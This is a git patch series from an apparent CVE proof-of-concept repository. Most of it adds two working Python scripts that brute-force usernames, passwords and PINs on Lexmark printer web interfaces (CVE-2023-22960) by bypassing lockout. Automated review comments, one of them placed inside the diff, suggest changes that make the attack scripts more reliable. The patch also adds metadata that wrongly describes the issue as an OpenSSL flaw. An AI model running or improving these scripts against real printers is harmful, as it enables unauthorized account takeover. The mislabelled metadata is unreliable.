From 716cf77750fb8ff7e960374fa5cb2cf754112830 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=B4=94=E8=8E=B9?= Date: Thu, 6 Apr 2023 12:56:05 +0000 Subject: [PATCH 1/2] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?zabbix/2022/yaml/CVE-2022-23131.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
---
 cve/zabbix/2022/yaml/CVE-2022-23131.yaml | 20 --------------------
 1 file changed, 20 deletions(-)
 delete mode 100644 cve/zabbix/2022/yaml/CVE-2022-23131.yaml
diff --git a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
deleted file mode 100644
index 0eab256c..00000000
--- a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: CVE-2022-23131
-source:
- https://github.com/L0ading-x/cve-2022-23131
-info:
- name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。
- severity: critical
- description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。
- scope-of-influence:
- Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2022-23131
- - https://www.secpulse.com/archives/179601.html
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2022-23131
- cwe-id: CWE-290
- cnvd-id: None
- kve-id: None
- tags: 前端认证绕过漏洞
\ No newline at end of file
-- Gitee From 7e72fb1f1daf73110dbda267963846b871c37e85 Mon Sep 17 00:00:00 2001
From: cuiying0719 Date: Thu, 6 Apr 2023 21:20:41 +0800 Subject: [PATCH 2/2] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-22960?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
---
 cve/openssl/2023/CVE-2023-22960/README.md | 26 ++++
 .../lexmark-brute-force-login.py | 112 ++++++++++++++++++
 .../lexmark-brute-force-pins.py | 106 +++++++++++++++++
 cve/openssl/2023/yaml/CVE-2023-22960.yaml | 18 +++
 openkylin_list.yaml | 1 +
 5 files changed, 263 insertions(+)
 create mode 100644 cve/openssl/2023/CVE-2023-22960/README.md
 create mode 100644 cve/openssl/2023/CVE-2023-22960/lexmark-brute-force-login.py
 create mode 100644 cve/openssl/2023/CVE-2023-22960/lexmark-brute-force-pins.py
 create mode 100644 cve/openssl/2023/yaml/CVE-2023-22960.yaml
diff --git a/cve/openssl/2023/CVE-2023-22960/README.md b/cve/openssl/2023/CVE-2023-22960/README.md
new file mode 100644
index 00000000..32231c82
--- /dev/null
+++ b/cve/openssl/2023/CVE-2023-22960/README.md
@@ -0,0 +1,26 @@
+# PoC for CVE-2023-22960
+[![Python](https://img.shields.io/badge/Python-%E2%89%A5%203.6-yellow.svg)](https://www.python.org/)
+
+[![License](https://img.shields.io/badge/license-MIT-red.svg)](https://github.com/t3l3machus/CVE-2023-22960/blob/main/LICENSE)
+## Details
+This vulnerability allows an attacker to bypass the credentials brute-force prevention mechanism of the Embedded Web Server (interface) of more than 60 Lexmark printer models. This issue affects both username-password and PIN authentication.
+
+**Official security advisory** -> https://publications.lexmark.com/publications/security-alerts/CVE-2023-22960.pdf
+
+**PoC tested against**:
+ - Lexmark MX622adhe
+ - Lexmark CX735adse
+ - Lexmark MX521ade
+
+#### Video Presentation
+In this video I demonstrate the issue as well as how to write an http(s) login bruteforce script with Python.
+https://www.youtube.com/watch?v=HuAqTScr_3s
+
+## Preview
+
+Without the brute-force prevention bypass:
+![image](https://user-images.githubusercontent.com/75489922/214288009-d0cda79b-e604-478a-9bbc-39175c20a6ab.png)
+
+
+Applying the the brute-force prevention bypass:
+![image](https://user-images.githubusercontent.com/75489922/214286428-fb2cc7b3-9c58-4aed-a343-2d66610ca407.png)
diff --git a/cve/openssl/2023/CVE-2023-22960/lexmark-brute-force-login.py b/cve/openssl/2023/CVE-2023-22960/lexmark-brute-force-login.py
new file mode 100644
index 00000000..20fd7460
--- /dev/null
+++ b/cve/openssl/2023/CVE-2023-22960/lexmark-brute-force-login.py
@@ -0,0 +1,112 @@
+#!/usr/bin/env python3
+#
+# Author: Panagiotis Chartas (t3l3machus)
+# Usage: lexmark-brute-force-login.py -t TARGET -P PROTOCOL -u USERNAMES_FILE -p PASSWORDS_FILE [-h]
+#
+# https://github.com/t3l3machus
+
+import requests, threading, re, argparse
+from random import randint
+requests.packages.urllib3.disable_warnings()
+
+# -------------- Arguments -------------- #
+parser = argparse.ArgumentParser()
+
+parser.add_argument("-t", "--target", action="store", help = "IP or domain name of the target. Use it to specify port as well (e.g. 192.168.0.56:8080)", required = True)
+parser.add_argument("-P", "--protocol", action="store", help = "HTTP or HTTPS.", required = True)
+parser.add_argument("-u", "--usernames-file", action="store", help = "File containing a usernames list", required = True)
+parser.add_argument("-p", "--passwords-file", action="store", help = "File containing a passwords list.", required = True)
+
+args = parser.parse_args()
+
+# Colors
+MAIN = '\033[38;5;50m'
+FAIL = '\033[1;91m'
+END = '\033[0m'
+BOLD = '\033[1m'
+ORANGE = '\033[0;38;5;214m'
+GREEN = '\033[38;5;82m'
+
+MAIN_BULLET = f'[{MAIN}*{END}]'
+
+# Threading
+max_threads = 80
+thread_limiter = threading.BoundedSemaphore(max_threads)
+
+# Request
+# The login URL below might not be exactly the same for all printer models. 
You may need to edit the resource /webglue/session/create
+login_url = f'{args.protocol}://{args.target}/webglue/session/create'
+
+headers = {
+ 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',
+ 'Accept': 'application/json, text/javascript, */*; q=0.01',
+ 'Accept-Language': 'en-US,en;q=0.5',
+ 'Accept-Encoding': 'gzip, deflate, br',
+ 'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8',
+ 'X-Requested-With': 'XMLHttpRequest',
+ 'Connection': 'keep-alive',
+ 'Cookie': 'lang=en; autoLogin=false',
+ 'Sec-Fetch-Dest': 'empty',
+ 'Sec-Fetch-Mode': 'cors',
+ 'Sec-Fetch-Site': 'same-origin'
+}
+
+# Usernames & Passwords
+def get_file_contents(path):
+
+ f = open(path, 'r')
+ contents = f.readlines()
+ f.close()
+ return contents
+
+
+usernames = get_file_contents(args.usernames_file)
+passwords = get_file_contents(args.passwords_file)
+users_count = len(usernames)
+passwds_count = len(passwords)
+
+
+def bruteforce(user):
+
+ thread_limiter.acquire()
+
+ for passwd in passwords:
+
+ passwd = passwd.strip()
+ authId = randint(-1000000, 1000000)
+ data = '{"authtype" : 0, "authId" : ' + str(authId) + ', "creds": {"username" : "' + user + '", "password" : "' + passwd + '"}}'
+ post_req_data = {'data': data, 'lang':'en'}
+
+ try:
+ response = requests.post(url = login_url, data = post_req_data, verify = False, allow_redirects = False, headers = headers)
+ content = response.content.decode()
+
+ if re.search('sessionId', content):
+ print(f'{GREEN}{user}{END} : {GREEN}{passwd}{END}\n' + content + '\n')
+
+ # Comment out the else statement for non verbose output
+ else:
+ print(f'{ORANGE}{user}{END} : {ORANGE}{passwd}{END} ' + content)
+
+ except:
+ print(f'{FAIL}FAIL{END} Something went wrong. 
[status: {response.status_code}]')
+
+ thread_limiter.release()
+
+
+
+def main():
+
+ print(f'\r{MAIN_BULLET} PoC for CVE-2023-22960 by t3l3machus (https://github.com/t3l3machus){END}')
+ print(f'{MAIN_BULLET} Initiating credentials brute force attack against: {login_url}{END}')
+ print(f'{MAIN_BULLET} Number of usernames loaded:{END} {users_count}')
+ print(f'{MAIN_BULLET} Number of passwords loaded:{END} {passwds_count}')
+ print(f'{MAIN_BULLET} Estimated number of queued login attempts:{END} {users_count*passwds_count}')
+
+ for user in usernames:
+ threading.Thread(target = bruteforce, args = (user.strip(),)).start()
+
+
+if __name__ == '__main__':
+ main()
+
\ No newline at end of file
diff --git a/cve/openssl/2023/CVE-2023-22960/lexmark-brute-force-pins.py b/cve/openssl/2023/CVE-2023-22960/lexmark-brute-force-pins.py
new file mode 100644
index 00000000..59a122a5
--- /dev/null
+++ b/cve/openssl/2023/CVE-2023-22960/lexmark-brute-force-pins.py
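Review bot: In `bruteforce` the slot taken by `thread_limiter.acquire()` is released only on the fall-through path, so any exception that escapes the loop leaks one of the 80 limiter slots for the rest of the run — and the `except:` handler itself is such an exception source, because it prints `response.status_code` while `response` is unbound whenever `requests.post` raised (connection refused, TLS error, timeout); the sibling pins script releases in a `finally:` and this one should too. The bare `except:` should narrow to `requests.RequestException` and report the exception rather than a status code that may not exist, and `requests.post` has no `timeout=`, so a printer that stops answering holds the slot indefinitely. The JSON body is also assembled by string concatenation, so a username or password containing `"` or `\` yields malformed JSON and a false "failed" result; `json.dumps` of the same structure produces equivalent JSON without that problem (add `json` to the import line).
```python
def bruteforce(user):

    thread_limiter.acquire()
    try:
        for passwd in passwords:

            passwd = passwd.strip()
            authId = randint(-1000000, 1000000)
            data = json.dumps({"authtype": 0, "authId": authId, "creds": {"username": user, "password": passwd}})
            post_req_data = {'data': data, 'lang':'en'}

            try:
                response = requests.post(url = login_url, data = post_req_data, verify = False, allow_redirects = False, headers = headers, timeout = 10)
                # … unchanged: decode response, print match / verbose line …
            except requests.RequestException as exc:
                print(f'{FAIL}FAIL{END} Something went wrong: {exc}')
    finally:
        thread_limiter.release()
```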
@@ -0,0 +1,106 @@
+#!/usr/bin/env python3
+#
+# Author: Panagiotis Chartas (t3l3machus)
+# usage: lexmark-brute-force-pins.py -t TARGET -P PROTOCOL -p PINS_FILE [-h]
+#
+# https://github.com/t3l3machus
+
+import requests, threading, re, argparse
+from random import randint
+requests.packages.urllib3.disable_warnings()
+
+parser = argparse.ArgumentParser()
+
+parser.add_argument("-t", "--target", action="store", help = "IP or domain name of the target. Use it to specify port as well (e.g. 192.168.0.56:8080)", required = True)
+parser.add_argument("-P", "--protocol", action="store", help = "HTTP or HTTPS.", required = True)
+parser.add_argument("-p", "--pins-file", action="store", help = "File containing a PINS list.", required = True)
+
+args = parser.parse_args()
+
+# Colors
+MAIN = '\033[38;5;50m'
+SUCCESS = '\033[38;5;82m'
+FAIL = '\033[1;91m'
+END = '\033[0m'
+BOLD = '\033[1m'
+ORANGE = '\033[0;38;5;214m'
+GREEN = '\033[38;5;82m'
+
+MAIN_BULLET = f'[{MAIN}*{END}]'
+
+# Threading
+max_threads = 80
+thread_limiter = threading.BoundedSemaphore(max_threads)
+
+# Request
+# The login URL below might not be exactly the same for all printer models. 
You may need to edit the resource /webglue/session/create
+login_url = f'{args.protocol}://{args.target}/webglue/session/create'
+
+headers = {
+ 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',
+ 'Accept': 'application/json, text/javascript, */*; q=0.01',
+ 'Accept-Language': 'en-US,en;q=0.5',
+ 'Accept-Encoding': 'gzip, deflate, br',
+ 'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8',
+ 'X-Requested-With': 'XMLHttpRequest',
+ 'Connection': 'keep-alive',
+ 'Cookie': 'lang=en; autoLogin=false',
+ 'Sec-Fetch-Dest': 'empty',
+ 'Sec-Fetch-Mode': 'cors',
+ 'Sec-Fetch-Site': 'same-origin'
+}
+
+# PINS
+def get_file_contents(path):
+
+ f = open(path, 'r')
+ contents = f.readlines()
+ f.close()
+ return contents
+
+
+pins = get_file_contents(args.pins_file)
+pins_count = len(pins)
+
+
+def bruteforce(pin):
+
+ thread_limiter.acquire()
+ pin = pin.strip()
+ authId = randint(-1000000, 1000000)
+ data = '{"authtype" : 3, "authId" : ' + str(authId) + ', "creds": {"pin" : "' + pin + '"}}'
+ post_req_data = {'data':data, 'lang':'en'}
+
+ try:
+ response = requests.post(url = login_url, data = post_req_data, verify = False, allow_redirects = False, headers = headers)
+ content = response.content.decode()
+
+ if re.search('sessionId', content):
+ print(f'Match: {GREEN}{pin}{END} ' + content)
+
+ # Comment out the else statement for non verbose output
+ else:
+ print(f'{ORANGE}{pin}{END} ' + content)
+
+ except:
+ print(f'{FAIL}FAIL{END} Something went wrong. 
[status: {response.status_code}]')
+
+ finally:
+ thread_limiter.release()
+
+
+
+def main():
+
+ print(f'\n{MAIN_BULLET} PoC for CVE-2023-22960 by t3l3machus (https://github.com/t3l3machus)')
+ print(f'{MAIN_BULLET} Initiating PIN authentication brute force attack against: {login_url}')
+ print(f'{MAIN_BULLET} Number of PINs loaded: {pins_count}')
+ print(f'{MAIN_BULLET} Successful attempts will be logged below (if any):')
+
+ for pin in pins:
+ threading.Thread(target = bruteforce, args = (pin.strip(),)).start()
+
+
+if __name__ == '__main__':
+ main()
+
\ No newline at end of file
diff --git a/cve/openssl/2023/yaml/CVE-2023-22960.yaml b/cve/openssl/2023/yaml/CVE-2023-22960.yaml
new file mode 100644
index 00000000..a9ed462c
--- /dev/null
+++ b/cve/openssl/2023/yaml/CVE-2023-22960.yaml
@@ -0,0 +1,18 @@
+id: CVE-2023-22960
+source: https://github.com//t3l3machus//CVE-2023-22960
+info:
+ name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。
+ severity: HIGH
+ description: Lexmark产品到2023-01-10对交互频率控制不当
+ scope-of-influence:
+ cpe:2.3:o:lexmark:b2236_firmware:*:*:*:*:*:*:*:*
+ reference:
+ - https://nvd.nist.gov/vuln/detail/cve-2023-22960
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2023-22960
+ cwe-id: CWE-307
+ cnvd-id: None
+ kve-id: None
+ tags: Lexmark产品到2023-01-10对交互频率控制不当
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index a9f9109b..e778cb63 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -136,6 +136,7 @@ cve:
 - CVE-2022-0778
 - CVE-2022-3786
 - CVE-2016-2107
+ - CVE-2023-22960
 joomla:
 - CVE-2023-23752
 libxml2:
-- Gitee
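Review bot: The `except:` handler in `bruteforce` prints `response.status_code`, but when `requests.post` itself raises (connection refused, TLS handshake failure, timeout) `response` was never bound, so the handler dies with an `UnboundLocalError` traceback instead of the intended message; the `finally:` still releases the semaphore, but the failure is misreported and the PIN is silently skipped. Catch the request error explicitly and report it: `except requests.RequestException as exc:` / `print(f'{FAIL}FAIL{END} Something went wrong: {exc}')`. The `requests.post` call also has no `timeout=`, so with 80 concurrent threads a printer that stops answering blocks every thread for the rest of the run; `timeout = 10` (or a `-T` option) is the minimum. As in the login script, `data` is built by string concatenation, so a PIN containing `"` or `\` produces malformed JSON and a spurious failure; `json.dumps({"authtype": 3, "authId": authId, "creds": {"pin": pin}})` produces equivalent JSON safely (add `json` to the import line).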
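Review bot: The `name:` field describes OpenSSL, but CVE-2023-22960 is a brute-force-protection bypass in the Embedded Web Server of Lexmark printers — the hunk's own `description:`, `cpe:2.3:o:lexmark:...` and `cwe-id: CWE-307` entries say so, as does the PoC README — so any consumer of this metadata is told the wrong product, and the file is likewise placed under `cve/openssl/`. Replace the line with a product description that matches the CVE, e.g. `name: Lexmark printer Embedded Web Server login interface; CVE-2023-22960 lets an unauthenticated attacker bypass its credential brute-force protection.` (or its Chinese equivalent to match the corpus). The `source:` URL has doubled path separators (`https://github.com//t3l3machus//CVE-2023-22960`) and should be `source: https://github.com/t3l3machus/CVE-2023-22960`. `scope-of-influence:` lists a single firmware CPE while the README states the vendor advisory covers more than 60 models, so it would be more useful to cite the advisory or the tested models rather than one CPE.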
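Review bot: The new `- CVE-2023-22960` entry is appended to a list whose section key lies above the hunk, but its neighbours `CVE-2022-0778`, `CVE-2022-3786` and `CVE-2016-2107` are all OpenSSL CVEs and `joomla:` / `libxml2:` are the sibling sections, so this Lexmark printer-firmware issue (CWE-307) is being filed as an OpenSSL vulnerability, mirroring the `cve/openssl/2023/` path chosen for the new files. Unless the list intentionally tracks every PoC added to the repository regardless of product, the line belongs in a `lexmark:` section (created if none exists) rather than under OpenSSL. I would also confirm that a Lexmark Embedded Web Server issue is in scope for this list at all, since its name suggests it tracks packages shipped by openKylin.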